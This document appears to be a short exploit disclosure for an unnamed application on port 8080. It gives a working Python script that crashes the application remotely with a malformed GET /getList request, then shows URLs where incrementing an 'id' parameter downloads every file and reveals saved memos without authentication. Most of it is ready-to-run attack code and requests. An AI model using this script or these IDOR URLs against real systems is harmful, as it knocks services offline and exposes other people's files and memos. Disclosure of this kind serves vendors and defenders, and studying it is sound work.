~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Remote Application Crashing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/usr/bin/python
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host=raw_input("Enter IP : ")
port=8080
def connect():
    try:
        s.connect((str(host),port))
    except socket.error:
        print "Error: couldn't connect"
        sys.exit()
    return "connected to target"
#Crashing the App
def crashing():
    req="GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1\r\n\r\n"
    try:
        s.sendall(req)
    except:
        print "Error occured, Couldn't crash App"
        sys.exit()
    return "Application Down, Conection closed"  
print connect()
print crashing()
______________________________________________________________________________________________________________________________

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2. Broken Authentication - Memo access & File download.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To download any file simply visit:

http://www.example.com:8080/?downloadSingle?id=1

Just by incrementing the value of "id" we can download all the files.  

TO view saved memos visit the below link:

http://www.example.com:8080/getText?id=0
